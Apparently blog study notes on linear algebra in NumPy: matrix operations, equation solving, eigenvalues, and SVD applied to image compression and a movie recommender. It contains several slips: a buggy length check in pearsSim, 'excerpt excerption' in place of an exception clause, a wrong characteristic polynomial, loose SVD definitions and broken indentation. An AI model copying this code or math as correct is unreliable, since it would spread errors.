    Load an image, compress it with the SVD, and rebuild it
    :param filename: file name
    :param p: percentage
    :param get_approx_SVD: which SVD selection method to call
    :param index: subplot index for the displayed image
    """
    img = Image.open(filename, 'r')
    a = np.array(img)
    R0 = a[:, :, 0] # red channel
    G0 = a[:, :, 1] # green channel
    B0 = a[:, :, 2] # blue channel
    R = get_approx_SVD(R0, p)
    G = get_approx_SVD(G0, p)
    B = get_approx_SVD(B0, p)
    I = np.stack((R, G, B), 2)

    # display the image
    plt.subplot(2, 5, index)
    if get_approx_SVD == get_approx_SVD1:
        plt.title("SVD1 " + str(int(p * 100)) + '%')
    else:
        plt.title("SVD2 " + str(int(p * 100)) + '%')
    plt.imshow(I)
    plt.axis('off')


if __name__ == "__main__":
    filename = "lenna.bmp"
    plt.figure(figsize=(10, 5))
    index = 0
    for p in np.arange(0.2, 1.2, 0.2):
        index += 1
        rebuild_img(filename, p, get_approx_SVD1, index)
    for p in np.arange(0.2, 1.2, 0.2):
        index += 1
        rebuild_img(filename, p, get_approx_SVD2, index)
    plt.show()

[Figure: 2 × 5 grid of SVD-compressed images at 20%-100% for both selection methods]

6.7 Worked Example 2: Recommending Products with the SVD

Preparation: import the relevant libraries

    import numpy as np
    from numpy import linalg as la
    import pandas as pd
    import time

1 Load the test dataset via a loadExData() function

def loadExData():
    """
    rows: users
    columns: movies
    values: the user's rating of the movie; 0 means unrated
    :return: the csv converted to an np.array
    """
    # pd.read_csv():
    #   sep: field separator used when reading the csv, comma by default
    #   header: which row supplies the DataFrame's column names, "infer" by default
    return np.array(pd.read_csv("评分.csv", sep=",", header=None))

2 Compute similarities, via three functions: ecludSim() (Euclidean distance), pearsSim() (Pearson correlation coefficient), and cosSim() (cosine similarity)

• Euclidean distance is just the distance between two points; its range is all of R

• The Pearson correlation coefficient should be the r from probability and statistics — I remember crashing my calculator with this trick back in middle school; its range is [-1, 1]

• Cosine similarity is the cosine of the angle between two vectors; 0 means the vectors are orthogonal, i.e. uncorrelated; its range is [-1, 1]

• Euclidean distance: $dist(\mathbf{X}, \mathbf{Y}) = \left \| \mathbf{X} - \mathbf{Y} \right \| $

• Pearson correlation: $r = \frac{( \mathbf{X-\bar{X}} ) \cdot ( \mathbf{Y-\bar{Y}} )}
  {\left \| \mathbf{X-\bar{X}} \right \| \cdot \left \| \mathbf{Y-\bar{Y}} \right \|} $

• Cosine similarity: $\cos\theta = \frac{\mathbf{X} \cdot \mathbf{Y}}{\left \| \mathbf{X} \right \| \cdot \left \| \mathbf{Y} \right \|}$

• Min-max normalization: $x' = \frac{x - \min(x)}{\max(x) - \min(x)}$

    """
    以下三种计算方式的参数 X 和 Y 都采用一维数组(向量), 返回的值越接近 1, 相关度越强
    """


    def ecludSim(X, Y):
    """
    利用欧氏距离计算相似度, 并归一化
    """
    return 1.0 / (1.0 + la.norm(X - Y))


    def pearsSim(X, Y):
    """
    利用皮尔逊相关系数计算相似度, 并归一化
    """
    if len(X < 3):
    return 1.0
    else:
    return 0.5 + 0.5 * np.corrcoef(X, Y, rowvar=1)[0][1]


    def cosSim(X, Y):
    """
    利用余弦相似度计算相似度, 并归一化
    """
    return 0.5 + 0.5 * (float(X.dot(Y)) / (la.norm(X) * la.norm(Y)))

3 Reduce the dimensionality of the matrix, via an svd_item() function

1. Choose the number k of singular values to keep, via a SigmaPct() function

def SigmaPct(sigma, percentage):
    """
    Pick k so that the first k singular values account for `percentage` of the
    total sum of squared singular values; the SVD step then uses k to reduce
    the dimensionality of the original item matrix
    """
    sum_sigma = sum(sigma ** 2)
    sum_sigma1 = sum_sigma * percentage # target share of the total squared sum
    sum_sigma2 = 0
    k = 0
    for i in sigma:
        sum_sigma2 += i * i
        k += 1
        if sum_sigma2 >= sum_sigma1:
            return k

2. Do the reduction, via an svd_item() function

def svd_item(data, percentage):
    """
    Dimensionality reduction
    :return: the items in the reduced space
    """
    n = np.shape(data)[1] # number of item kinds
    U, s, VT = la.svd(data) # SVD of the dataset; s holds the diagonal values
    k = SigmaPct(s, percentage) # the first k values already carry `percentage` of the energy
    Sigma = np.eye(k) * s[:k] # build the diagonal matrix
    # Map the data into the k-dimensional (low-dimensional) space
    return data.T.dot(U[:, :k].dot(la.inv(Sigma))) # items in the reduced space

4 In the reduced data, predict a rating for one item the user has not rated, via an svd_predict() function

$$ P_{uj} = \frac{\sum_{i \in item1} W_{ji}\, r_{ui}}{\sum_{i \in item1} W_{ji}} $$

• Here $P_{uj}$ is the predicted rating of item $j$ by user $u$, $item1$ is the set of items the user has already rated, $W_{ji}$ is the similarity between items $j$ and $i$, and $r_{ui}$ is user $u$'s rating of item $i$
• Intuition: items (vectors) that are more similar — per the chosen similarity measure — to items the user rated highly in the past are more likely to rank high in the user's recommendation list.

def svd_predict(data, user, simMeas, FormedItems, item):
    """
    Predict ratings for unrated items based on item similarity
    :param data: the rating matrix (rows are users)
    :param user: user index
    :param simMeas: similarity function
    :param FormedItems: the items in the SVD-reduced space
    :param item: column index of the item to score
    :return: the predicted rating, used later for sorting
    """
    n = np.shape(data)[1] # number of item kinds (columns)
    Totalsim = 0.0 # accumulated similarity
    TotalratSim = 0.0 # accumulated similarity-weighted ratings
    # Walk over the items in the given user's row
    # (i.e. compare every item the user has rated against the target item)
    for j in range(n):
        # the given user's rating for item j
        Rating_user = data[user, j]
        # only compare against rated items that are not the target itself
        if Rating_user != 0 and j != item:
            # similarity between items `item` and j in the SVD-reduced space;
            # the similarity function is itself passed in as a parameter
            Similarity = simMeas(FormedItems[item, :], FormedItems[j, :])
            Totalsim += Similarity # accumulate the similarity
            TotalratSim += Similarity * Rating_user # accumulate similarity x rating
    if Totalsim == 0:
        return 0
    else:
        return TotalratSim / Totalsim # predicted rating, used later for sorting

5 Produce the N items with the highest predicted ratings, returning item ids and predicted scores, via a recommend() function

def recommend(data, user, FormedItems, N, simMeas):
    # build the list of items the user has not yet rated
    unratedItems = np.array(np.nonzero(data[user, :] == 0))[0]
    if len(unratedItems) == 0:
        return "You have already rated every item" # nothing left to recommend
    Scoresitem = []
    for item in unratedItems: # predict a rating for every unrated item
        # compute the predicted rating
        estimatedScore = svd_predict(data, user, simMeas, FormedItems,
                                     item)
        Scoresitem.append((item, estimatedScore)) # record the item and its score
    Scoresitem = sorted(Scoresitem, key=lambda x: x[1], reverse=True) # sort by score, descending
    return Scoresitem[:N] # return the top N items

6 Recommend products for a given user, via a recommend_predict() function.

def recommend_predict():
    user_item = loadExData() # load the data
    percentage = 0.9 # share of the sum of squared singular values to keep
    user = 1 # the user to predict for
    n = 4 # number of recommendations
    FormedItems = svd_item(user_item, percentage) # items after SVD reduction

    s_t = time.time()
    simMeas = cosSim # similarity measure
    r1 = recommend(user_item, user, FormedItems, n, simMeas)
    print('SVD recommendations using cosine similarity:')
    print("recommended item ids:", r1, "\nelapsed:", time.time() - s_t)

    s_t = time.time()
    simMeas = ecludSim
    r2 = recommend(user_item, user, FormedItems, n, simMeas)
    print('SVD recommendations using Euclidean distance:')
    print("recommended item ids:", r2, "\nelapsed:", time.time() - s_t)

    s_t = time.time()
    simMeas = pearsSim
    r3 = recommend(user_item, user, FormedItems, n, simMeas)
    print('SVD recommendations using the Pearson correlation coefficient:')
    print("recommended item ids:", r3, "\nelapsed:", time.time() - s_t)

7 Call recommend_predict() to get the results.

if __name__ == "__main__":
    recommend_predict()

SVD recommendations using cosine similarity:
recommended item ids: [(1605, 3.7280993014041743), (935, 3.72778748418618), (366, 3.7274892395964807), (812, 3.7260645630753846)] 
elapsed: 1.6344106197357178
SVD recommendations using Euclidean distance:
recommended item ids: [(8, 3.690142726938304), (514, 3.689943318086311), (14, 3.6894721117751406), (172, 3.689287056157151)] 
elapsed: 1.240149736404419
SVD recommendations using the Pearson correlation coefficient:
recommended item ids: [(1, 3.7096774193548385), (2, 3.7096774193548385), (3, 3.7096774193548385), (4, 3.7096774193548385)] 
elapsed: 0.8249673843383789

6.8.2 Building the User-Movie Rating Matrix

import numpy as np
import pandas as pd

# 1. Read the dataset; header = [user id, movie id, rating (integer), submission time in seconds]
header = ["user_id", "item_id", "rating", "timestamp"]
data = pd.read_csv("u.data", sep="\t", names=header) # read u.data as csv with tab separators and these column names
# 2. Build the user-item rating matrix
# Check for duplicate (user, item) rating records (data cleaning)
# data.duplicated() # boolean Series marking where the duplicates are
data.duplicated(subset=["user_id", "item_id"]).sum() # number of duplicate records
item_id_user = data.groupby("item_id").count()["user_id"] # table of (item id, number of rating users)
print(item_id_user)
# Build the user-item matrix
users_num = data.user_id.max() # take the largest id, which also sidesteps duplicates
items_num = data.item_id.max()
user_item_rating = np.zeros((users_num, items_num))
for line in data.itertuples(): # itertuples() iterates the DataFrame as tuples
    # assign from the tuple
    user_item_rating[line[1] - 1, line[2] - 1] = line[3]
# Save the user-movie rating matrix as a comma-separated text file
np.savetxt("评分 2.csv", user_item_rating, delimiter=",")
# Show the first 5 rows of u.data
data.head()
item_id
1       452
2       131
3        90
4       209
5        86
       ... 
1678      1
1679      1
1680      1
1681      1
1682      1
Name: user_id, Length: 1682, dtype: int64
    user_id item_id rating timestamp
    0 196 242 3 881250949
    1 186 302 3 891717742
    2 22 377 1 878887116
    3 244 51 2 880606923
    4 166 346 1 886397596
# the size of u.data
print("dataset size:", data.shape)
# number of users and movies
print("users =", users_num)
print("movies =", items_num)
print("users * movies:", users_num * items_num)
# nonzero entries of the generated user_item_rating
print("nonzero entries in user_item_rating:", len(user_item_rating.nonzero()[1]))
print("nonzero entries of user_item_rating:", user_item_rating.nonzero()[1])
# sparsity of the generated user_item_rating matrix
sparsity = round(len(user_item_rating.nonzero()[1]) / float(users_num * items_num), 3)
print("sparsity of user_item_rating:", sparsity)
print("shape of user_item_rating:", user_item_rating.shape)
# show the user-movie rating matrix as a table: columns are movies, rows are users
pd.DataFrame(user_item_rating)
dataset size: (100000, 4)
users = 943
movies = 1682
users * movies: 1586126
nonzero entries in user_item_rating: 100000
nonzero entries of user_item_rating: [   0    1    2 ... 1187 1227 1329]
sparsity of user_item_rating: 0.063
shape of user_item_rating: (943, 1682)
    0 1 2 3 4 5 6 7 8 9 ... 1672 1673 1674 1675 1676 1677 1678 1679 1680 1681
    0 5.0 3.0 4.0 3.0 3.0 5.0 4.0 1.0 5.0 3.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    1 4.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 2.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    2 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    3 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    4 4.0 3.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ...
    938 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 5.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    939 0.0 0.0 0.0 2.0 0.0 0.0 4.0 5.0 3.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    940 5.0 0.0 0.0 0.0 0.0 0.0 4.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    941 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    942 0.0 5.0 0.0 0.0 0.0 0.0 0.0 0.0 3.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0

    943 rows × 1682 columns

    ]]>
    + 正文:2 核心篇

    5 将研究对象形式化——线性代数基础

    5.3.3 矩阵的创建

    直接生成

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import numpy as np

    A = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]
    arr1 = np.array(A)
    print("A=", A)
    print("arr1=\n", arr1)
    B = ((1, 2, 3, 4), (5, 6, 7, 8), (9, 10, 11, 12))
    arr2 = np.array(B)
    print("B=", B)
    print("arr2=\n", arr2)

    print("type(A)=", type(A))
    print("type(B)=", type(B))
    print("type(arr1)=", type(arr1))
    print("arr1.shape=", arr1.shape)
    A= [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]arr1= [[ 1  2  3  4] [ 5  6  7  8] [ 9 10 11 12]]B= ((1, 2, 3, 4), (5, 6, 7, 8), (9, 10, 11, 12))arr2= [[ 1  2  3  4] [ 5  6  7  8] [ 9 10 11 12]]type(A)= <class 'list'>type(B)= <class 'tuple'>type(arr1)= <class 'numpy.ndarray'>arr1.shape= (3, 4)

    间接创建

    1
    2
    3
    4
    5
    6
    import numpy as np

    arr1 = np.random.random((2, 3))
    print("arr1=\n", arr1)
    arr2 = np.random.randint(3, 30, size=[2, 3]) # 3-30(不包括 30)
    print("arr2=\n", arr2)
    arr1= [[0.7888749  0.29995777 0.79464025] [0.48565204 0.77377983 0.84873221]]arr2= [[19 17  7] [ 4 25 14]]

    改变矩阵的大小

    1
    2
    3
    4
    5
    6
    7
    8
    9
    import numpy as np

    A = [1, 2, 3, 4, 5, 6]
    B = np.array(A)
    C1 = B.reshape(2, 3)
    C2 = B.reshape(3, 2)
    print("B=", B)
    print("C1=\n", C1)
    print("C2=\n", C2)
    B= [1 2 3 4 5 6]C1= [[1 2 3] [4 5 6]]C2= [[1 2] [3 4] [5 6]]

    矩阵元素的存取

    1
    C1[0]  # 第 0 行
    array([1, 2, 3])
    1
    C1[0:2]  #  0-2(不含 2)行
    array([[1, 2, 3],       [4, 5, 6]])
    1
    C2[[0, 2]]  # 第 0 行和第 2 行
    array([[1, 2],       [5, 6]])
    1
    C2[:, 1]  # 第 1 列
    array([2, 4, 6])
    1
    C2[:, 0:2]  # 0-2(不含 2)列
    array([[1, 2],       [3, 4],       [5, 6]])
    1
    C1[:, [0, 2]]  # 第 0 列和第 2 列
    array([[1, 3],       [4, 6]])
    1
    C2[2, 1]  # 第 2 行第 1 列
    6
    1
    C2[2][1]  # 第 2 行第 1 列
    6

    5.3.4 向量的创建

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import numpy as np

    A = [[1, 2, 3, 4, 5]]
    B = [[1], [2], [3], [4], [5]]
    C = np.array(A)
    D = np.array(B)
    print("C=\n", C)
    print("D=\n", D)
    print("C.shape", np.shape(C))
    print("D.shape", np.shape(D))
    C= [[1 2 3 4 5]]D= [[1] [2] [3] [4] [5]]C.shape (1, 5)D.shape (5, 1)

    5.4 特殊的矩阵

    零矩阵

    1
    np.zeros(10)
    array([0., 0., 0., 0., 0., 0., 0., 0., 0., 0.])
    1
    np.zeros((2, 4))
    array([[0., 0., 0., 0.],       [0., 0., 0., 0.]])
    1
    np.array([np.zeros(10)])
    array([[0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]])

    单位矩阵

    1
    np.eye(3)
    array([[1., 0., 0.],       [0., 1., 0.],       [0., 0., 1.]])
    1
    np.identity(3)
    array([[1., 0., 0.],       [0., 1., 0.],       [0., 0., 1.]])

    对角矩阵

    1
    2
    arr1 = np.diag([1, 2, 3])
    arr1
    array([[1, 0, 0],       [0, 2, 0],       [0, 0, 3]])
    1
    np.diag(arr1)
    array([1, 2, 3])

    上三角矩阵

    1
    2
    A = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]])
    np.triu(A, 0)
    array([[ 1,  2,  3,  4],       [ 0,  6,  7,  8],       [ 0,  0, 11, 12],       [ 0,  0,  0, 16]])
    1
    np.tril(A, 0)
    array([[ 1,  0,  0,  0],       [ 5,  6,  0,  0],       [ 9, 10, 11,  0],       [13, 14, 15, 16]])

    判断矩阵是否相等

    1
    2
    3
    A = np.array([[1, 2, 3], [4, 5, 6]])
    B = np.array([1, 2, 3, 4, 5, 6]).reshape(2, 3)
    np.allclose(A, B)
    True

    5.5 矩阵基本操作

    5.5.3 矩阵乘法

    1
    2
    3
    A = np.array([[1, 2], [1, 0]])
    B = np.diag([2, 2])
    A.dot(B) # 矩阵乘法 AB
    array([[2, 4],       [2, 0]])
    1
    A * B  # np.array 类型, * 表示对应元素相乘
    array([[2, 0],       [0, 0]])
    1
    np.multiply(A, B)
    array([[2, 0],       [0, 0]])
    1
    2
    3
    A = np.mat([[1, 2], [1, 0]])
    B = np.mat(np.diag([2, 2]))
    A * B # np.mat 类型, * 表示矩阵乘法
    matrix([[2, 4],        [2, 0]])

    5.5.5 矩阵的乘方

    只有方阵才可进行乘方运算.对 array 类型, 矩阵的乘方要经多次 dot 运算得到, 对 matrix 类型, 可以通过 ** 得到, array 类型的 ** 是每个元素的 n 次方

    1
    2
    3
    4
    A = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
    A_array = np.array(A)
    A_matrix = np.mat(A)
    A_array.dot(A_array).dot(A_array)
    array([[ 468,  576,  684],       [1062, 1305, 1548],       [1656, 2034, 2412]])
    1
    A_array ** 3
    array([[  1,   8,  27],       [ 64, 125, 216],       [343, 512, 729]], dtype=int32)
    1
    A_matrix ** 3
    matrix([[ 468,  576,  684],        [1062, 1305, 1548],        [1656, 2034, 2412]])

    5.6.1 转置矩阵

    利用转置矩阵创建对称矩阵

    1
    2
    3
    4
    5
    6
    7
    8
    9
    import numpy as np

    arr1 = np.random.randint(1, 16, size=[3, 3])
    arr2 = np.triu(arr1)
    arr2 += arr2.T - np.diag(np.diag(arr2))

    print("arr1=\n", arr1)
    print("arr2=\n", arr2)
    print(np.allclose(arr2, arr2.T))
    arr1= [[ 8 14 15] [13 13 12] [ 3  8 12]]arr2= [[ 8 14 15] [14 13 12] [15 12 12]]True

    5.6.2 逆矩阵

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import numpy as np

    A = [[1, 2], [2, 5]]
    C1 = np.array(A)
    C2 = np.mat(A)
    C1_inverse = np.linalg.inv(C1) # array 类型不能使用 C1.I
    C2_inverse = C2.I
    print("C1_inverse=\n", C1_inverse)
    print("C2_inverse=\n", C2_inverse)
    print("C1.dot(C1_inverse)=\n", C1.dot(C1_inverse))
    C1_inverse= [[ 5. -2.] [-2.  1.]]C2_inverse= [[ 5. -2.] [-2.  1.]]C1.dot(C1_inverse)= [[1. 0.] [0. 1.]]
    1
    C2 ** (-1)
    matrix([[ 5., -2.],        [-2.,  1.]])

    “导致降维”, 行列式为 0 的矩阵不可逆

    1
    2
    3
    4
    try:
    np.mat([[0, 0], [0, 1]]) ** (-1)
    excerpt excerption as e:
    print(e)
    Singular matrix

    5.7.4 行列式的计算

    1
    np.linalg.det(np.diag([1, 2, 3, 4]))  # np.linalg 线性代数
    23.999999999999993

    5.8.4 矩阵的秩

    1
    np.linalg.matrix_rank(np.diag([1, 2, 3]))
    3
    1
    np.linalg.matrix_rank(np.diag([1, 2, 0]))
    2

    5.9.1 向量的内积

    1
    2
    3
    4
    5
    A = [[1, 2, 3]]
    B = [[4, 5, 6]]
    C1 = np.array(A).reshape(3, 1) # 转换成列向量
    C2 = np.array(B).reshape(3, 1)
    np.dot(C1.T, C2)
    array([[32]])

    5.9.2 向量的长度

    1
    2
    A = np.array([[0, 3, 4]])
    np.linalg.norm(A)
    5.0

    5.9.4 标准正交基

    定义 5.17 在复数范围内满足$ATA=AAT=E$, 则称$A$为酉矩阵
    酉矩阵常用于奇异值分解(SVD)中, 正交矩阵是实数特殊化的酉矩阵

    综合实例——线性代数在实际问题中的应用

    解方程组:

    $$
    \left{\begin{matrix}
    x + 2y + z = 7
    \ 2x - y + 3z = 7
    \ 3x + y + 2z =18
    \end{matrix}\right.
    $$

    1
    2
    3
    4
    5
    6
    import numpy as np

    A = np.mat([[1, 2, 1], [2, -1, 3], [3, 1, 2]])
    B = np.mat([7, 7, 18]).reshape(3, 1)
    AB = np.hstack((A, B))
    AB
    matrix([[ 1,  2,  1,  7],        [ 2, -1,  3,  7],        [ 3,  1,  2, 18]])

    1 利用逆矩阵求$AX=B$, $X=A^{-1}B$

    1
    2
    X = A.I * B
    X
    matrix([[ 7.],        [ 1.],        [-2.]])
    1
    A * X  # 验证
    matrix([[ 7.],        [ 7.],        [18.]])

    2 利用 np.linalg.solve()

    1
    np.linalg.solve(A, B)
    matrix([[ 7.],        [ 1.],        [-2.]])

    3 利用 Sympy 库的 solve 函数

    1
    2
    3
    4
    5
    6
    7
    import sympy
    from sympy.abc import x, y, z

    eq = [x + 2 * y + z - 7,
    2 * x - y + 3 * z - 7,
    3 * x + y + 2 * z - 18]
    sympy.solve(eq, [x, y, z])
    {x: 7, y: 1, z: -2}

    解具有无穷解的方程组

    $$
    \left{\begin{matrix}
    x + 2y + z - 2w = 0
    \ 2x + 3y - w = 0
    \ x - y - 5z + 7w = 0
    \end{matrix}\right.
    $$

    1
    2
    3
    4
    5
    6
    import numpy as np

    A = np.array([[1, 2, 1, -2],
    [2, 3, 0, -1],
    [1, -1, -5, 7]])
    np.linalg.matrix_rank(A)
    2
    1
    2
    3
    4
    5
    6
    import sympy
    from sympy.abc import x, y, z, w

    eq = [x + 2 * y + z - 2 * w, 2 * x + 3 * y - w, x - y - 5 * z + 7 * w]
    result = sympy.solve(eq, [x, y, z, w])
    result
    {x: -4*w + 3*z, y: 3*w - 2*z}
    1
    2
    3
    4
    A = {z:1, w:2}
    x = float(result[x].evalf(subs=A))
    y = float(result[y].evalf(subs=A))
    x, y
    (-5.0, 4.0)

    例 5.18 获取数据集的数据 读取 csv 文件

    1
    2
    3
    4
    5
    import pandas as pd
    import numpy as np

    dataset = pd.read_csv("iris.csv")
    data = np.array(dataset)

    5.12 习题

    (1)

    分别使用三种方法求线性方程组的解

    $$
    \left { \begin{matrix}
    x+y+z=2
    \x+2y+4z=3
    \x+3y+9z=5
    \end{matrix}\right .
    $$

    1
    1
    2
    3
    4
    5
    6
    7
    8
    import numpy as np

    A = np.mat([[1, 1, 1],
    [1, 2, 4],
    [1, 3, 9]])
    B = np.mat([2, 3, 5]).reshape(3, 1)
    AB = np.hstack((A, B))
    AB
    matrix([[1, 1, 1, 2],        [1, 2, 4, 3],        [1, 3, 9, 5]])
    1
    A.I * B
    matrix([[ 2. ],        [-0.5],        [ 0.5]])
    2
    1
    np.linalg.solve(A, B)
    matrix([[ 2. ],        [-0.5],        [ 0.5]])
    3
    1
    2
    3
    4
    5
    import sympy
    from sympy.abc import x, y, z

    eq = [x + y + z - 2, x + 2 * y + 4 * z - 3, x + 3 * y + 9 * z - 5]
    sympy.solve(eq, [x, y, z])
    {x: 2, y: -1/2, z: 1/2}

    (2)

    分别创建 3 * 4 阶和 4 * 5 阶的矩阵,元素值为 1-20 的随机整数,计算着两个矩阵的乘积,求这两个矩阵的秩

    1
    2
    3
    4
    5
    import numpy as np

    A = np.random.randint(1, 20, size=[3, 4])
    B = np.random.randint(1, 20, size=[4, 5])
    A, B
    (array([[ 2, 18, 16,  6],        [19,  1, 12, 19],        [11,  9, 18, 17]]), array([[ 7, 14, 14, 14,  6],        [11, 10, 11,  8, 10],        [ 4,  3,  8,  4, 11],        [11, 10, 14,  1,  3]]))
    1
    A.dot(B)
    array([[342, 316, 438, 242, 386],       [401, 502, 639, 341, 313],       [435, 468, 635, 315, 405]])
    1
    np.linalg.matrix_rank(A)
    3
    1
    np.linalg.matrix_rank(B)
    4

    (3)

    求下面矩阵的逆矩阵,求逆矩阵时要先求行列式,行列式不为 0 时逆矩阵存在,之后再进行求逆操作

    $$
    A=\begin{bmatrix}
    1 & 2 & 3 \
    2 & 2 & 1 \
    3 & 4 & 3
    \end{bmatrix}
    $$

    1
    2
    3
    4
    5
    6
    import numpy as np

    A = np.mat([[1, 2, 3],
    [2, 2, 1],
    [3, 4, 3]])
    np.linalg.det(A)
    1.9999999999999993
    1
    A.I
    matrix([[ 1. ,  3. , -2. ],        [-1.5, -3. ,  2.5],        [ 1. ,  1. , -1. ]])

    (4)

    分别创建四阶零矩阵和四阶单位矩阵,以及对角线元素分别为 1,2,3,4 的对角矩阵

    1
    np.zeros((4, 4))
    array([[0., 0., 0., 0.],       [0., 0., 0., 0.],       [0., 0., 0., 0.],       [0., 0., 0., 0.]])
    1
    np.identity(4)
    array([[1., 0., 0., 0.],       [0., 1., 0., 0.],       [0., 0., 1., 0.],       [0., 0., 0., 1.]])
    1
    np.diag([1, 2, 3, 4])
    array([[1, 0, 0, 0],       [0, 2, 0, 0],       [0, 0, 3, 0],       [0, 0, 0, 4]])

    (5)

    创建一个四阶方阵,元素值为 1~20 的随机浮点数,根据其上三角和下三角矩阵创建其对应的对称矩阵

    1
    2
    A = np.random.random(16).reshape(4, 4) * 20
    A
    array([[14.08629999,  3.99280371, 13.3828697 , 13.32337192],       [11.80703601, 11.72735218,  7.43395284, 14.95671889],       [18.40134451, 17.69715348, 14.43624563,  4.31954707],       [11.07252469,  7.31171911, 16.52018505, 11.79353701]])
    1
    np.triu(A)
    array([[14.08629999,  3.99280371, 13.3828697 , 13.32337192],       [ 0.        , 11.72735218,  7.43395284, 14.95671889],       [ 0.        ,  0.        , 14.43624563,  4.31954707],       [ 0.        ,  0.        ,  0.        , 11.79353701]])
    1
    np.triu(A).T + np.triu(A) - np.diag(np.diag(A))
    array([[14.08629999,  3.99280371, 13.3828697 , 13.32337192],       [ 3.99280371, 11.72735218,  7.43395284, 14.95671889],       [13.3828697 ,  7.43395284, 14.43624563,  4.31954707],       [13.32337192, 14.95671889,  4.31954707, 11.79353701]])
    1
    np.tril(A).T + np.tril(A) - np.diag(np.diag(A))
    array([[14.08629999, 11.80703601, 18.40134451, 11.07252469],       [11.80703601, 11.72735218, 17.69715348,  7.31171911],       [18.40134451, 17.69715348, 14.43624563, 16.52018505],       [11.07252469,  7.31171911, 16.52018505, 11.79353701]])

    6 从数据中提取重要信息——特征值与矩阵分解

    6.1.4 特征值的实现

    已知
    $$A=
    \begin{bmatrix}
    4 & 2 \
    1 & 5
    \end{bmatrix}
    $$
    求 A 的特征值和特征向量

    $|A-\lambda E|=
    \begin{vmatrix}
    4- \lambda & 2\
    1 & 5 - \lambda
    \end{vmatrix}=0$

    $(4 - \lambda)(5 - \lambda) = 0$

    $\lambda ^ 2 - 9\lambda + 18 = 0$

    特征值: $\lambda _ {1} = 3$, $\lambda _ {2} = 6$

    $A - 3E =
    \begin{bmatrix}
    1 & 2\
    1 & 2
    \end{bmatrix} \to$ 特征向量 $(-2, 1)^T$, 单位化得$(-\frac{2}{5}\sqrt 5,\frac {1}{5}\sqrt 5)^T$

    $A - 6E =
    \begin{bmatrix}
    -2 & 2\
    1 & -1
    \end{bmatrix} \to$ 特征向量 $(1, 1)^T$, 单位正交化得$(-\frac{1}{2}\sqrt 2, -\frac{1}{2}\sqrt 2)^T$

    1
    2
    3
    4
    import numpy as np

    A = np.array([[4, 2], [1, 5]])
    eig_val, eig_vex = np.linalg.eig(A) # eig()函数分别求解特征值和特征向量矩阵
    1
    eig_val  # 特征值
    array([3., 6.])
    1
    eig_vex  # 特征向量矩阵(已标准化)
    array([[-0.89442719, -0.70710678],       [ 0.4472136 , -0.70710678]])

    得特征向量$(-\frac{2}{5}\sqrt 5,\frac {1}{5}\sqrt 5)^T$, $(-\frac{1}{2}\sqrt 2, -\frac{1}{2}\sqrt 2)^T$

    6.3 特征值分解

    特征值分解是将矩阵$A$分解成$A=Q\Sigma Q^{-1}$的形式, 要求矩阵必须是 n 维方阵, 将特征值分解算法推广到所有矩阵之上, 就是更加通用的奇异值分解(SVD)

    6.4 奇异值分解(SVD)

    • 这个知识点本科和考研居然没有学过……大概是因为计算量太大了吧

    • 参考教程【学长小课堂】什么是奇异值分解 SVD–SVD 如何分解时空矩阵

    • SVD 可以将任意的矩阵分解为三个矩阵相乘, 简记为$A=U\Sigma V^T$

    • 其中$U$和$V$是正交矩阵, 分别对应$AAT$和$ATA$的特征向量,$\Sigma$是一个对角矩阵, 对角元素为$A$的特征值(按降序排列), 奇异值$^2$=特征值

    • 可以把$A$看作是一个线性变换,将 A 分解为: $U$旋转, $\Sigma$拉伸, $V^T$旋转

    • 奇异值是非负实数

    • 定理:设 A 和 B 是两个矩阵(注意不限定大小,但是必须满足做矩阵积 AB 和 BA 都有意义),则 AB 与 BA 拥有相同的非零特征值,并且保持相同重数,并且属于非零特征值的特征向量间存在制约关系。为什么 A^TA 与 AA^T 有相同特征值?

    $$A _ {m * n} = U _ {m * m}\Sigma _ {m * n}V _ {m * n}^T$$
    $$
    \begin{bmatrix}
    0 & 1\
    1 & 1\
    1 & 0
    \end{bmatrix}=
    \begin{bmatrix}
    1/\sqrt6 & 1/\sqrt2 & 1/\sqrt3\
    2/\sqrt6 & 0 & -1/\sqrt3\
    1/\sqrt6 & -1/\sqrt2 & 1/\sqrt3
    \end{bmatrix}
    \begin{bmatrix}
    \sqrt3 & 0\
    0 & 1\
    0 & 0
    \end{bmatrix}
    \begin{bmatrix}
    1/\sqrt2 & 1/\sqrt2\
    -1/\sqrt2 & 1/\sqrt2
    \end{bmatrix}
    $$

    1
    2
    3
    4
    5
    import numpy as np

    # A = np.array([[1, 5, 7, 6, 1], [2, 1, 10, 4, 4], [3, 6, 7, 5, 2]])
    A = np.array([[0, 1], [1, 1], [1, 0]]) # https://zhuanlan.zhihu.com/p/29846048
    A
    array([[0, 1],       [1, 1],       [1, 0]])

    使用定义进行 SVD

    1
    2
    3
